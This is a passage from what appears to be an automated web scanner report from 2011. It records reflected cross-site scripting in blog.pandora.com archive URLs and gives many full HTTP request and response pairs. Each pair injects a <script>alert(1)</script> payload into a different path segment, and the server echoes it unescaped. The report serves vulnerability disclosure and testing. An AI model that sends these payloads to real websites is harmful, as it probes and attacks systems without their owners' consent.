Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora9e242<script>alert(1)</script>c3f15fa67f4/archives/2009/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 89b64<script>alert(1)</script>b2d3b4a18a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives89b64<script>alert(1)</script>b2d3b4a18a8/2009/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives89b64<script>alert(1)</script>b2d3b4a18a8/2009/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7feb3<script>alert(1)</script>350dc8da11b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20097feb3<script>alert(1)</script>350dc8da11b/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20097feb3<script>alert(1)</script>350dc8da11b/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4d46<script>alert(1)</script>419734980f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/01b4d46<script>alert(1)</script>419734980f5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:06 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/01b4d46<script>alert(1)</script>419734980f5/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4d541<script>alert(1)</script>2442df8266b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4d541<script>alert(1)</script>2442df8266b/archives/2009/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora4d541<script>alert(1)</script>2442df8266b/archives/2009/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a4a2<script>alert(1)</script>ff59d7e80db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4a4a2<script>alert(1)</script>ff59d7e80db/2009/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4a4a2<script>alert(1)</script>ff59d7e80db/2009/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 714ce<script>alert(1)</script>bf225eb4a1f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009714ce<script>alert(1)</script>bf225eb4a1f/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009714ce<script>alert(1)</script>bf225eb4a1f/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 92265<script>alert(1)</script>2c48c4d86bc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/0292265<script>alert(1)</script>2c48c4d86bc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/0292265<script>alert(1)</script>2c48c4d86bc/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload efa04<script>alert(1)</script>a909529678b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraefa04<script>alert(1)</script>a909529678b/archives/2009/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraefa04<script>alert(1)</script>a909529678b/archives/2009/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bc94c<script>alert(1)</script>9dc1dabafdc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbc94c<script>alert(1)</script>9dc1dabafdc/2009/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:44 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbc94c<script>alert(1)</script>9dc1dabafdc/2009/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c2a57<script>alert(1)</script>b7dc6cce338 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009c2a57<script>alert(1)</script>b7dc6cce338/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009c2a57<script>alert(1)</script>b7dc6cce338/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61662<script>alert(1)</script>e1daff6cf96 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/0361662<script>alert(1)</script>e1daff6cf96/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/0361662<script>alert(1)</script>e1daff6cf96/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7af11<script>alert(1)</script>1a13f4a03d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora7af11<script>alert(1)</script>1a13f4a03d2/archives/2009/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora7af11<script>alert(1)</script>1a13f4a03d2/archives/2009/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload beaf3<script>alert(1)</script>b750ded26f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbeaf3<script>alert(1)</script>b750ded26f8/2009/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbeaf3<script>alert(1)</script>b750ded26f8/2009/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68bf4<script>alert(1)</script>2d188b48660 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200968bf4<script>alert(1)</script>2d188b48660/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:36 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200968bf4<script>alert(1)</script>2d188b48660/04/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7adfa<script>alert(1)</script>b1f6f7ee47a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/047adfa<script>alert(1)</script>b1f6f7ee47a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/047adfa<script>alert(1)</script>b1f6f7ee47a/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee40e<script>alert(1)</script>6dc1333d8df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraee40e<script>alert(1)</script>6dc1333d8df/archives/2009/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraee40e<script>alert(1)</script>6dc1333d8df/archives/2009/05/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 83b92<script>alert(1)</script>91c0dbd346e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives83b92<script>alert(1)</script>91c0dbd346e/2009/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives83b92<script>alert(1)</script>91c0dbd346e/2009/05/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7b54d<script>alert(1)</script>4def9d0af6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20097b54d<script>alert(1)</script>4def9d0af6/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 348
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20097b54d<script>alert(1)</script>4def9d0af6/05/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4fdb9<script>alert(1)</script>8f219a229f4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/054fdb9<script>alert(1)</script>8f219a229f4/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:38 GMT
